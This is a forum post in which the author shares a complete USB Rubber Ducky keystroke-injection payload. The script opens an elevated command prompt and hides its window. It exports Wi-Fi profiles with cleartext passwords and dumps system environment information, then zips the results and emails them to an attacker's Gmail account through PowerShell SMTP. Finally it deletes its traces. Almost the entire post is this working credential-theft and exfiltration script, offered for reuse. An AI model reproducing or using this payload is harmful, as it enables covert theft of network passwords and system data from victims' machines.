Hello fellow Hak5 fans!!! I recently have just written my first USB Rubber Ducky Payload and thought I would share it.
If you spot any errors/improvements let me know .
REM Author: Zeta
REM Date: 4/5/15
REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail.
REM------------------------OPEN & HIDE------------------------
DELAY 750
GUI r
DELAY 400
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 555
ALT y
DELAY 555
ENTER
ENTER
ALT SPACE
STRING M
DOWNARROW
REPEAT 111
ENTER
REM ----------------------COLLECT & DUMP----------------------
STRING set TEMPDIR=%systemdrive%\de-temp
ENTER
STRING mkdir %TEMPDIR%
ENTER
STRING cd %TEMPDIR%
ENTER
STRING netsh wlan export profile key=clear
ENTER
STRING set > info.txt
ENTER
STRING cd..
ENTER
REM ---------------------------------------------ZIPPING FILE---------------------------------------------
DELAY 450
STRING echo Set objArgs = WScript.Arguments > _zipIt.vbs
ENTER
STRING echo InputFolder = objArgs(0) >> _zipIt.vbs
ENTER
STRING echo ZipFile = objArgs(1) >> _zipIt.vbs
ENTER
STRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs
ENTER
STRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbs
ENTER
STRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbs
ENTER
STRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbs
ENTER
STRING echo wScript.Sleep 2000 >> _zipIt.vbs
ENTER
STRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zip
ENTER
DELAY 200
REM -----------------------------------EMAIL LOG VIA GMAIL-----------------------------------
STRING powershell -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('USERNAME', 'PASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'EMAIL'; $ReportEmail.To.Add('EMAIL'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 100
REM ---------------------DELETE AND END---------------------
STRING RD /S /Q "%systemdrive%\de-temp"
ENTER
STRING TYPE nul > %systemdrive%\de-temp.zip
ENTER
STRING DEL /Q %systemdrive%\de-temp.zip
ENTER
STRING TYPE nul > %systemdrive%\_zipIt.vbs
ENTER
STRING DEL /Q %systemdrive%\_zipIt.vbs
ENTER
STRING exit
ENTER